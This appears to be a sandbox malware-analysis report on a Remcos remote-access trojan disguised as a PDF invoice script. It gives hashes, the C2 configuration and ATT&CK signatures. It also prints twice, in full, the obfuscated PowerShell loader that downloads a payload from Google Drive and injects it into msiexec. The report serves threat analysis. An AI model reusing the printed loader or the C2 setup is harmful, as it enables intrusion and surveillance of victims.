remcos | e4ea11f5460a15c91a45fab777cdef0c3245e732a41f2f485e2d7bfdd989f9be

General

Target

A1_racun_09-2024·pdf.vbs
Size

72KB
MD5

75c46eded8d56cffa52b4bf86615c200
SHA1

8519d8a27d4663d6c3c70991c0cc757d16790b4e
SHA256

8e1d67ca2d0e0003ed384472bc64f1c659ea0433539b821203c7e4d42b5efe18
SHA512

3732e3bb921c00dd67d9f630b6638ec05aa097a4e7b4ffdb7344014ee9ba74d8924db42f1d6789577529573bbfca03394cde3e81d4253dd013dcbb2833a07d8d
SSDEEP

1536:sBg98qp1hVcA8ACb+p3HzYxZ+cBvSnAnO70P5XIf:si9fvAAO+lcBanCOZf

Score

10^/10

remcos remotehost discovery execution rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

a458386d9.duckdns.org:3256

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
delete_file
false
hide_file
true
hide_keylog_file
false
install_flag
false
keylog_crypt
true
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-WDQFG0
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Blocklisted process makes network request 9 IoCs

flow	pid	Process
17	4196	powershell.exe
19	4196	powershell.exe
45	3300	msiexec.exe
47	3300	msiexec.exe
49	3300	msiexec.exe
51	3300	msiexec.exe
52	3300	msiexec.exe
56	3300	msiexec.exe
58	3300	msiexec.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation	WScript.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4196	powershell.exe
4252	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
16	drive.google.com
17	drive.google.com
45	drive.google.com

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
3300	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
4252	powershell.exe
3300	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
4196	powershell.exe
4196	powershell.exe
4252	powershell.exe
4252	powershell.exe
4252	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
4252	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	4196	powershell.exe
Token: SeDebugPrivilege	4252	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3300	msiexec.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 4968 wrote to memory of 4196	4968	WScript.exe	82
PID 4968 wrote to memory of 4196	4968	WScript.exe	82
PID 4252 wrote to memory of 3300	4252	powershell.exe	93
PID 4252 wrote to memory of 3300	4252	powershell.exe	93
PID 4252 wrote to memory of 3300	4252	powershell.exe	93
PID 4252 wrote to memory of 3300	4252	powershell.exe	93

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\A1_racun_09-2024·pdf.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4968
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Bedstemorens Tweets sautes Reweaving Bldt #>;$Sigten='Precelebrant';<#Opisthographal Uncurious Sumdum Oratorially Nonreligiously Bronkitisserne #>;$Erogen=$host.PrivateData;If ($Erogen) {$Blgedalenes++;}function Udligningsbelbene($Fatuity52){$Skiff42=$Bethank+$Fatuity52.Length-$Blgedalenes;for( $Wienerinder=5;$Wienerinder -lt $Skiff42;$Wienerinder+=6){$gedeskindenes='Slder';$Forsamledes+=$Fatuity52[$Wienerinder];}$Forsamledes;}function Dunne($Pulik){ . ($Knaphulsstings) ($Pulik);}$Salinities=Udligningsbelbene 'FrizzMDisowo DiaczUninviCunenlMi aslCarboaMokke/Param5Germa. Aus,0Mblet Schi,(WaterWBr dbiEng gntilhudHjspnoSuscewTemposUd.ke ClumpNRe deTIntel Brome1Balst0Subre.A oni0Tidsb; ,les NonarWStjeriLecitn Bodr6 Trl 4Flyvr;Doate F senx i co6.mphi4 Soli;.otal AbomarMankivKnst :kl ss1Forul2Pl ds1Sintr.Toers0 pka)N cki Eru tG LommeOpiumcTanglkDebtsoViros/Beska2Geolo0U.dra1Omvi 0Abbre0 ampr1Konto0Hemat1Lan,l RapmbF aneniLukrzrGuanoeSkottf,orveo P.scx Para/Excit1trykn2Brneh1 duis.Plove0 Petr ';$zymotize=Udligningsbelbene 'dic cUErkynsRaideETimbeRBukse- Pis,aUdtaggMiddlEmi liNOribatSubsu ';$Distriktsblade121=Udligningsbelbene 'Foggih En stAccort bahupSemimsExami:Micro/Totur/EjenddNonprr nwomiF derv sbjeeTehue.HandlgSummeo BistoStarcg MrkelLiggeeEpipl. LaurcSemiboNeshnmCoedu/ GroguBiophc data? Udk,eDerivxCastap KrumoSamfur PasttCon,r=Maskid enfaoMe etwExa tnRetr l Rej o Couna ugtidPlanl&HotdoiDimind .ecu=Ropis1GrundWForelnSamd KAttri9B.oloxSlutnw N,wtoProseHVater6KatedBOperoPTogbeVGlauco etallSpidsxHe.erVplagerTen oRTilraKReligVUnterF Hov OBoldk4,arkexTendeI VeroXInstrJImperaWendioShankpAf ra7LengtrVarmh ';$Aquatones=Udligningsbelbene 'Volie>Peziz ';$Knaphulsstings=Udligningsbelbene 'K.llaIFrankEU.chaX.atte ';$Brislers='Raastofmangelens';$Plowed='\Tungebaand.Oly';Dunne (Udligningsbelbene ' N.tr$ PrevgSecu l Cygnostak bSkud abag il Nonv:Fort aUnheusKonfofAkslea DomfltapewtBankkeCano rRegule dri tMeni = xcla$Cloc eAfpron For,v Fris: Pl.raSkridpArt cpKvrked lasuaSneaptSisteaAnted+Pregr$sterePUnacclMisa oOp rkw redieGoo ydafd a ');Dunne (Udligningsbelbene ' tema$DownhgSambhlSigj.oByerhbSignaa,ekselPer o:ZircoOCou aoGive nAddretBibli=Slkni$ S bnDYd rli Kar.s rastMcknirWeakfiMetank Ra et,lodpsfjogtb malalTib raRedssd ideneScen,1,melt2 bibe1Peb.l.f lmosAftrap Cobaltomgaian setPaneg(Ar.ej$SurliASundeq GodsuT,nkbaHonortMadlaoSrbotnLathdeVildesFl.pp)Ba el ');Dunne (Udligningsbelbene '.reye[SludaN Ba eeConsttTerrn.ValutSBurnie .ichrCratcvI,tegiBarylc Ex oeignazP Betho CybeiOmordnOutletIndtgMn viga StvsnH lomaRaastgDeclae MacrrEn ea]kines:Vedtg:A magSNi,roe LtnicMinisuRy eprFals,i YenstSerowyRackaPFatter Prinotr lltRameqoMycetcNonimoNons lFi tl Bd i=Tegng Avit.[ HydrN Ov reKapact Impo. RubeSCe,eveFundhcSubpruBoodlrmerskiPylort antyBylanPReal,rB uehoFlas tBismaoR ligcBiddeo FastlH lefT,tofmySagtmp PaineOv,ra] ogeb:Catal:Hjer TRealilKortssKokke1Landb2Endot ');$Distriktsblade121=$Oont[0];$Obtund=(Udligningsbelbene 'R pag$UneclGNaturlHeptyo,roodbCr ssAComprL redi:HeiniELighelFeminIintermRuddliStemmnOrrhoENonp.RNonseiCountNMakroGDioceEPearlRDolesN AirsETypalSIndla=WhirlnPartoESr.gnw Hell-Imp cOSlagsbpremiJ rintETndehCcomprTNedfo klftnsAltstyWeepis mel,TApokaeDrikfm Mo,n. Ko oNRntgeESlg ntAvert. iplawM ldieIngveBBadmic NytaLKust,IlrdomEShithNFrek.TK gep ');Dunne ($Obtund);Dunne (Udligningsbelbene 'Aff t$PolicE.hinil fhei KrnemS ilii Zionnl,gere.ndrir ggriblu.bnRewhigEn.gme ndtgr FlamnVagtpePolytsEndos.Vi trHAerose Unreaafterdpr,foePr,prrD.scis Afho[Lns i$Bec ezTempeyOpacim lippoVensktTelefiStemmzOms ee.udsf]tandr= Land$MozinSLgemiaSmu llAntediEnantn SpdbiMetabtP esciP inteGru tsBerga ');$Studfishes=Udligningsbelbene 'Halmv$CentrEEst dlBetini IsohmTotaliTi kpnSibyle nthrrBroafiSt esnAfblogD nateMdeplr.husenTabe.e laybsDisma. ErhvDZamb o HouswHaemonIn erl ornioKerataRefordMemenFLa.dli tol lImposeBohrm( Aads$FigurDFrokoiUn,las Ark,t IgbirFejldiUniplk Paast Thias rtifbRefo l MultaS oerd PrineTa pi1Fuld.2Okker1Livsv,Axega$ Syb.MReve iAnekdc SargrUpta oFo eph DoboiEfte,sMen etAblaso.roprlMonegoArro gt ilwyHandi)Knipl ';$Microhistology=$asfalteret;Dunne (Udligningsbelbene 'Still$T tmagBlokilChickoBetydBMoreiaKommaLmikro: IndkBmo,ilrNutilk RaagSA kapt,orseRDi maeSpaltg Arbee SpinNMilja= Deci( GelnTForf EMur.esSki.pTRab,l-S rotPSetouA awaitW tchHtost krigs$ AntiMMimreIE,ihiCPladsRChromo AbonhKohreiStjplSslrepTS ammOCirculSvumnoAnimagGeonoyHuman)Bas i ');while (!$Brkstregen) {Dunne (Udligningsbelbene 'Inter$Restag,ropylIndivoNststbbog,yaSmittlCereb:StatiLImp daUd ykm Sk tpTempoe Fl t=Finan$kastrt Teknr FaluuFolkee iger ') ;Dunne $Studfishes;Dunne (Udligningsbelbene 'Bev tSPh.set AlefaH.rnerGauditSuper-O ersSHyperlSh,pbeElsdyeDrivfpChair S bem4 onex ');Dunne (Udligningsbelbene ' Gyms$Hede.gRsterlJobsko.xittb mallaPrinclYde l: FrdiB TromrStbolkinflas Ophit HavorSdceletegnsgHydr eEkskonPjatt=P,sit(GalsiTUnf ce FishsBajontFlise-KipchPEftera GenatPhotoh Bun Afve,$Leis,MBeveliSheddcAmphirTomfoo nacah Hypoi Tunes Const Inn,o ismol ithio frangtsendy ellb)Brewt ') ;Dunne (Udligningsbelbene 'Forli$SkralgBlomslReiv.o genb tilkaHe.tellongo:PileoRNympheContrt SpiriDadeln,regotS,mareSk.lddTrold=Sci.p$ iewg Jernl ebroRegnfbBogtiaIdentlKapac:Span F KnucaAnkyluBesttnKlynkaLejevt Kbete,cerndOvers1Nonac9Bes.e7Bylde+Quart+ Trea%Disbu$adjunOTurntoE,ochn Dh.bttrans.OplyscUnem oembr,u Folkn aletJenop ') ;$Distriktsblade121=$Oont[$Retinted];}$Faglrereksaminerne=306046;$Jumpers=31093;Dunne (Udligningsbelbene 'Snebl$ScrewgHeptalinhe oBagerb LeodaUpknilRebet:SidelVwi doitredjdKelloe,agttonaesttBjarke gentxSclert nder Telev=Bifil u docGhklineForurtT.gns-gorheCArmhuo,ensinProbltRomanep eben ConvtDrags Mir.$DecedM Shrii RisqcinfirrglycioAfterhBelgniSlar s,nbehtT,edbo Jal lKata,o UndegNdig yTunin ');Dunne (Udligningsbelbene 'Blads$UnglugJailhlPrivao Ico bReproas,mmelOpina: Woo R Chroeknarrn EdelgMasturKittliElatonDesorgSlj,ssBrnesmAmbitiRep,td ,tuddJacuaeCa.sulBols f irkua Her bSakarrRetu i B.kekUrofuaE,holn Bri tP,oceeesphrr Div nS gene To,dsa,kyl Olie =Prfe Hypod[OmbudSKon.ly Elo sGrammtSondeeFejlsmSubge.BademCAnnonoRakisnS ppev Eri eStuntr Eurotbu ge]Ep sy:Huma :Dimi.FstrumrbesvaoB igemPhyllBJernvaChocos.idude Sulk6Pre.e4 goleSKontotFreelrArauci P asnLea agBesig(Jazze$EinegVMazo i sl pdNewtoeSpyt o rikttBarefeFoldnx Ust,t Scan)Kanva ');Dunne (Udligningsbelbene 'Dis r$Kaldeg hiffl StriostivnbAutova.yanslPurit: UjvnsVandbpNytaaeAbrikn F gkcReubee Unorra,idlk.utnaj CepeoSala l,itche EthnrC.mon Seneg= Cy,o Holos[H.steSSynchy Tilts.rosstEnd.ceWoo bmS rut.Tn stT ParaeDisenxDep,otS nco. HjttEConfinS owfcUntiroUninudStithiFuld n ForvgAntnd]Cirr :Tampn:TabueA LaveS TwinCKu stIIndefIUvs,n.BreakGAlleye G netWiattSOvervtMargir MisliTaxomn,kandgSagfr( Toil$Ib,riROxideeTypebnAttingLarinrSawtoiDuedonflatbg EpissRegiomP stei KopidHea adsjle.eGuld,l Bo bfHaandaKontobKomfor nalyiAnmelk HusuaKnsttn Ihrdt,ukeye rierAntifnmelleeInd.os ongh) Test ');Dunne (Udligningsbelbene ' Octo$Pyridg,actel,birroT thob Ord a Panpl Ess,:M rciNtetryoRel anDyre eGoplexSchedpMonola PengnTrlgnsFrosciEloinvAdusteSup rnSprineConars ootsSvejf= Par $Loques An lpdw rfeSalamnPterocSextueDorharSkurkkBrogajUnc,ro lammlRecroe unstr Auxi.NonprsHex.guPas abCh issPro ctHesper LogwiAktivnSti pgAf en( nsha$sulciF Dec.aFjantgBehanlPseudrKnalde A.tsrStoryeMaattk,oldks,nhecaR spem,aleoiMars nR.hineDyslerB olon Siouenonp , Warr$ MothJDam,suTyt emTotalpB smaeProcorSvindsTrane)Ussrm ');Dunne $Nonexpansiveness;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4196

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Bedstemorens Tweets sautes Reweaving Bldt #>;$Sigten='Precelebrant';<#Opisthographal Uncurious Sumdum Oratorially Nonreligiously Bronkitisserne #>;$Erogen=$host.PrivateData;If ($Erogen) {$Blgedalenes++;}function Udligningsbelbene($Fatuity52){$Skiff42=$Bethank+$Fatuity52.Length-$Blgedalenes;for( $Wienerinder=5;$Wienerinder -lt $Skiff42;$Wienerinder+=6){$gedeskindenes='Slder';$Forsamledes+=$Fatuity52[$Wienerinder];}$Forsamledes;}function Dunne($Pulik){ . ($Knaphulsstings) ($Pulik);}$Salinities=Udligningsbelbene 'FrizzMDisowo DiaczUninviCunenlMi aslCarboaMokke/Param5Germa. Aus,0Mblet Schi,(WaterWBr dbiEng gntilhudHjspnoSuscewTemposUd.ke ClumpNRe deTIntel Brome1Balst0Subre.A oni0Tidsb; ,les NonarWStjeriLecitn Bodr6 Trl 4Flyvr;Doate F senx i co6.mphi4 Soli;.otal AbomarMankivKnst :kl ss1Forul2Pl ds1Sintr.Toers0 pka)N cki Eru tG LommeOpiumcTanglkDebtsoViros/Beska2Geolo0U.dra1Omvi 0Abbre0 ampr1Konto0Hemat1Lan,l RapmbF aneniLukrzrGuanoeSkottf,orveo P.scx Para/Excit1trykn2Brneh1 duis.Plove0 Petr ';$zymotize=Udligningsbelbene 'dic cUErkynsRaideETimbeRBukse- Pis,aUdtaggMiddlEmi liNOribatSubsu ';$Distriktsblade121=Udligningsbelbene 'Foggih En stAccort bahupSemimsExami:Micro/Totur/EjenddNonprr nwomiF derv sbjeeTehue.HandlgSummeo BistoStarcg MrkelLiggeeEpipl. LaurcSemiboNeshnmCoedu/ GroguBiophc data? Udk,eDerivxCastap KrumoSamfur PasttCon,r=Maskid enfaoMe etwExa tnRetr l Rej o Couna ugtidPlanl&HotdoiDimind .ecu=Ropis1GrundWForelnSamd KAttri9B.oloxSlutnw N,wtoProseHVater6KatedBOperoPTogbeVGlauco etallSpidsxHe.erVplagerTen oRTilraKReligVUnterF Hov OBoldk4,arkexTendeI VeroXInstrJImperaWendioShankpAf ra7LengtrVarmh ';$Aquatones=Udligningsbelbene 'Volie>Peziz ';$Knaphulsstings=Udligningsbelbene 'K.llaIFrankEU.chaX.atte ';$Brislers='Raastofmangelens';$Plowed='\Tungebaand.Oly';Dunne (Udligningsbelbene ' N.tr$ PrevgSecu l Cygnostak bSkud abag il Nonv:Fort aUnheusKonfofAkslea DomfltapewtBankkeCano rRegule dri tMeni = xcla$Cloc eAfpron For,v Fris: Pl.raSkridpArt cpKvrked lasuaSneaptSisteaAnted+Pregr$sterePUnacclMisa oOp rkw redieGoo ydafd a ');Dunne (Udligningsbelbene ' tema$DownhgSambhlSigj.oByerhbSignaa,ekselPer o:ZircoOCou aoGive nAddretBibli=Slkni$ S bnDYd rli Kar.s rastMcknirWeakfiMetank Ra et,lodpsfjogtb malalTib raRedssd ideneScen,1,melt2 bibe1Peb.l.f lmosAftrap Cobaltomgaian setPaneg(Ar.ej$SurliASundeq GodsuT,nkbaHonortMadlaoSrbotnLathdeVildesFl.pp)Ba el ');Dunne (Udligningsbelbene '.reye[SludaN Ba eeConsttTerrn.ValutSBurnie .ichrCratcvI,tegiBarylc Ex oeignazP Betho CybeiOmordnOutletIndtgMn viga StvsnH lomaRaastgDeclae MacrrEn ea]kines:Vedtg:A magSNi,roe LtnicMinisuRy eprFals,i YenstSerowyRackaPFatter Prinotr lltRameqoMycetcNonimoNons lFi tl Bd i=Tegng Avit.[ HydrN Ov reKapact Impo. RubeSCe,eveFundhcSubpruBoodlrmerskiPylort antyBylanPReal,rB uehoFlas tBismaoR ligcBiddeo FastlH lefT,tofmySagtmp PaineOv,ra] ogeb:Catal:Hjer TRealilKortssKokke1Landb2Endot ');$Distriktsblade121=$Oont[0];$Obtund=(Udligningsbelbene 'R pag$UneclGNaturlHeptyo,roodbCr ssAComprL redi:HeiniELighelFeminIintermRuddliStemmnOrrhoENonp.RNonseiCountNMakroGDioceEPearlRDolesN AirsETypalSIndla=WhirlnPartoESr.gnw Hell-Imp cOSlagsbpremiJ rintETndehCcomprTNedfo klftnsAltstyWeepis mel,TApokaeDrikfm Mo,n. Ko oNRntgeESlg ntAvert. iplawM ldieIngveBBadmic NytaLKust,IlrdomEShithNFrek.TK gep ');Dunne ($Obtund);Dunne (Udligningsbelbene 'Aff t$PolicE.hinil fhei KrnemS ilii Zionnl,gere.ndrir ggriblu.bnRewhigEn.gme ndtgr FlamnVagtpePolytsEndos.Vi trHAerose Unreaafterdpr,foePr,prrD.scis Afho[Lns i$Bec ezTempeyOpacim lippoVensktTelefiStemmzOms ee.udsf]tandr= Land$MozinSLgemiaSmu llAntediEnantn SpdbiMetabtP esciP inteGru tsBerga ');$Studfishes=Udligningsbelbene 'Halmv$CentrEEst dlBetini IsohmTotaliTi kpnSibyle nthrrBroafiSt esnAfblogD nateMdeplr.husenTabe.e laybsDisma. ErhvDZamb o HouswHaemonIn erl ornioKerataRefordMemenFLa.dli tol lImposeBohrm( Aads$FigurDFrokoiUn,las Ark,t IgbirFejldiUniplk Paast Thias rtifbRefo l MultaS oerd PrineTa pi1Fuld.2Okker1Livsv,Axega$ Syb.MReve iAnekdc SargrUpta oFo eph DoboiEfte,sMen etAblaso.roprlMonegoArro gt ilwyHandi)Knipl ';$Microhistology=$asfalteret;Dunne (Udligningsbelbene 'Still$T tmagBlokilChickoBetydBMoreiaKommaLmikro: IndkBmo,ilrNutilk RaagSA kapt,orseRDi maeSpaltg Arbee SpinNMilja= Deci( GelnTForf EMur.esSki.pTRab,l-S rotPSetouA awaitW tchHtost krigs$ AntiMMimreIE,ihiCPladsRChromo AbonhKohreiStjplSslrepTS ammOCirculSvumnoAnimagGeonoyHuman)Bas i ');while (!$Brkstregen) {Dunne (Udligningsbelbene 'Inter$Restag,ropylIndivoNststbbog,yaSmittlCereb:StatiLImp daUd ykm Sk tpTempoe Fl t=Finan$kastrt Teknr FaluuFolkee iger ') ;Dunne $Studfishes;Dunne (Udligningsbelbene 'Bev tSPh.set AlefaH.rnerGauditSuper-O ersSHyperlSh,pbeElsdyeDrivfpChair S bem4 onex ');Dunne (Udligningsbelbene ' Gyms$Hede.gRsterlJobsko.xittb mallaPrinclYde l: FrdiB TromrStbolkinflas Ophit HavorSdceletegnsgHydr eEkskonPjatt=P,sit(GalsiTUnf ce FishsBajontFlise-KipchPEftera GenatPhotoh Bun Afve,$Leis,MBeveliSheddcAmphirTomfoo nacah Hypoi Tunes Const Inn,o ismol ithio frangtsendy ellb)Brewt ') ;Dunne (Udligningsbelbene 'Forli$SkralgBlomslReiv.o genb tilkaHe.tellongo:PileoRNympheContrt SpiriDadeln,regotS,mareSk.lddTrold=Sci.p$ iewg Jernl ebroRegnfbBogtiaIdentlKapac:Span F KnucaAnkyluBesttnKlynkaLejevt Kbete,cerndOvers1Nonac9Bes.e7Bylde+Quart+ Trea%Disbu$adjunOTurntoE,ochn Dh.bttrans.OplyscUnem oembr,u Folkn aletJenop ') ;$Distriktsblade121=$Oont[$Retinted];}$Faglrereksaminerne=306046;$Jumpers=31093;Dunne (Udligningsbelbene 'Snebl$ScrewgHeptalinhe oBagerb LeodaUpknilRebet:SidelVwi doitredjdKelloe,agttonaesttBjarke gentxSclert nder Telev=Bifil u docGhklineForurtT.gns-gorheCArmhuo,ensinProbltRomanep eben ConvtDrags Mir.$DecedM Shrii RisqcinfirrglycioAfterhBelgniSlar s,nbehtT,edbo Jal lKata,o UndegNdig yTunin ');Dunne (Udligningsbelbene 'Blads$UnglugJailhlPrivao Ico bReproas,mmelOpina: Woo R Chroeknarrn EdelgMasturKittliElatonDesorgSlj,ssBrnesmAmbitiRep,td ,tuddJacuaeCa.sulBols f irkua Her bSakarrRetu i B.kekUrofuaE,holn Bri tP,oceeesphrr Div nS gene To,dsa,kyl Olie =Prfe Hypod[OmbudSKon.ly Elo sGrammtSondeeFejlsmSubge.BademCAnnonoRakisnS ppev Eri eStuntr Eurotbu ge]Ep sy:Huma :Dimi.FstrumrbesvaoB igemPhyllBJernvaChocos.idude Sulk6Pre.e4 goleSKontotFreelrArauci P asnLea agBesig(Jazze$EinegVMazo i sl pdNewtoeSpyt o rikttBarefeFoldnx Ust,t Scan)Kanva ');Dunne (Udligningsbelbene 'Dis r$Kaldeg hiffl StriostivnbAutova.yanslPurit: UjvnsVandbpNytaaeAbrikn F gkcReubee Unorra,idlk.utnaj CepeoSala l,itche EthnrC.mon Seneg= Cy,o Holos[H.steSSynchy Tilts.rosstEnd.ceWoo bmS rut.Tn stT ParaeDisenxDep,otS nco. HjttEConfinS owfcUntiroUninudStithiFuld n ForvgAntnd]Cirr :Tampn:TabueA LaveS TwinCKu stIIndefIUvs,n.BreakGAlleye G netWiattSOvervtMargir MisliTaxomn,kandgSagfr( Toil$Ib,riROxideeTypebnAttingLarinrSawtoiDuedonflatbg EpissRegiomP stei KopidHea adsjle.eGuld,l Bo bfHaandaKontobKomfor nalyiAnmelk HusuaKnsttn Ihrdt,ukeye rierAntifnmelleeInd.os ongh) Test ');Dunne (Udligningsbelbene ' Octo$Pyridg,actel,birroT thob Ord a Panpl Ess,:M rciNtetryoRel anDyre eGoplexSchedpMonola PengnTrlgnsFrosciEloinvAdusteSup rnSprineConars ootsSvejf= Par $Loques An lpdw rfeSalamnPterocSextueDorharSkurkkBrogajUnc,ro lammlRecroe unstr Auxi.NonprsHex.guPas abCh issPro ctHesper LogwiAktivnSti pgAf en( nsha$sulciF Dec.aFjantgBehanlPseudrKnalde A.tsrStoryeMaattk,oldks,nhecaR spem,aleoiMars nR.hineDyslerB olon Siouenonp , Warr$ MothJDam,suTyt emTotalpB smaeProcorSvindsTrane)Ussrm ');Dunne $Nonexpansiveness;"
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4252
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\syswow64\msiexec.exe"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:3300

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
144B

MD5
bbb5fcf7ef18bd2c264a4006592ce143

SHA1
4421910f4331285b13819adb7cb4c513fbe9cacd

SHA256
523a88acf0b2666336c7d556a381cf3d8b3299a3580b8aee0b3277df46b320af

SHA512
ef59f9918673a45f03b41bf8634684946b3f3328331d6838dfa9dd7ffa22ad644a47e97c777e960aca0f44741162e07d9d979de6b26a890ea06eaee9221dc584

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
71444def27770d9071039d005d0323b7

SHA1
cef8654e95495786ac9347494f4417819373427e

SHA256
8438eded7f1ab9b4399a069611fe8730226bcdce08fab861d4e8fae6ef621ec9

SHA512
a721af797fd6882e6595b7d9610334f1fb57b809e504452eed4b0d0a32aaf07b81ce007bd51605bec9fcea7ec9f1d8424db1f0f53b65a01126ec4f5980d86034

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_igiee3jd.rsw.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Tungebaand.Oly

Filesize
438KB

MD5
0743eaf070a6ca9050b3c77dc3ce4e17

SHA1
10bca95e76500e62c55e184ecbfbd9c41b21e4ec

SHA256
79481ee789ec7e7da046d266e6b3628e666aff76bc57213ffcadfbd5900f7503

SHA512
2024f6b23068a9b4e5dffdab6a4acd490da8ede8990fe18d13e0bbfff47918e475489bb5f1c18f54fb5a1d8e998e1625477facbe7cf45e5c28dcd4c4885ce321

Download Submit
memory/3300-60-0x0000000000E90000-0x00000000020E4000-memory.dmp

Filesize
18.3MB

Download
memory/4196-16-0x00007FFE7E840000-0x00007FFE7F301000-memory.dmp

Filesize
10.8MB

Download
memory/4196-15-0x00007FFE7E843000-0x00007FFE7E845000-memory.dmp

Filesize
8KB

Download
memory/4196-17-0x00007FFE7E840000-0x00007FFE7F301000-memory.dmp

Filesize
10.8MB

Download
memory/4196-18-0x00007FFE7E840000-0x00007FFE7F301000-memory.dmp

Filesize
10.8MB

Download
memory/4196-21-0x00007FFE7E840000-0x00007FFE7F301000-memory.dmp

Filesize
10.8MB

Download
memory/4196-22-0x00007FFE7E840000-0x00007FFE7F301000-memory.dmp

Filesize
10.8MB

Download
memory/4196-12-0x00007FFE7E840000-0x00007FFE7F301000-memory.dmp

Filesize
10.8MB

Download
memory/4196-11-0x00007FFE7E840000-0x00007FFE7F301000-memory.dmp

Filesize
10.8MB

Download
memory/4196-10-0x000001CF26720000-0x000001CF26742000-memory.dmp

Filesize
136KB

Download
memory/4196-0-0x00007FFE7E843000-0x00007FFE7E845000-memory.dmp

Filesize
8KB

Download
memory/4252-26-0x00000000055D0000-0x0000000005636000-memory.dmp

Filesize
408KB

Download
memory/4252-37-0x0000000005DF0000-0x0000000006144000-memory.dmp

Filesize
3.3MB

Download
memory/4252-27-0x0000000005C80000-0x0000000005CE6000-memory.dmp

Filesize
408KB

Download
memory/4252-39-0x0000000006410000-0x000000000642E000-memory.dmp

Filesize
120KB

Download
memory/4252-40-0x00000000064A0000-0x00000000064EC000-memory.dmp

Filesize
304KB

Download
memory/4252-42-0x00000000069A0000-0x00000000069BA000-memory.dmp

Filesize
104KB

Download
memory/4252-41-0x0000000007C40000-0x00000000082BA000-memory.dmp

Filesize
6.5MB

Download
memory/4252-44-0x0000000007610000-0x0000000007632000-memory.dmp

Filesize
136KB

Download
memory/4252-43-0x0000000007660000-0x00000000076F6000-memory.dmp

Filesize
600KB

Download
memory/4252-45-0x0000000008870000-0x0000000008E14000-memory.dmp

Filesize
5.6MB

Download
memory/4252-25-0x0000000005530000-0x0000000005552000-memory.dmp

Filesize
136KB

Download
memory/4252-47-0x0000000008E20000-0x000000000D6D6000-memory.dmp

Filesize
72.7MB

Download
memory/4252-24-0x0000000005650000-0x0000000005C78000-memory.dmp

Filesize
6.2MB

Download
memory/4252-23-0x0000000002AF0000-0x0000000002B26000-memory.dmp

Filesize
216KB

Download

Analysis

Sharing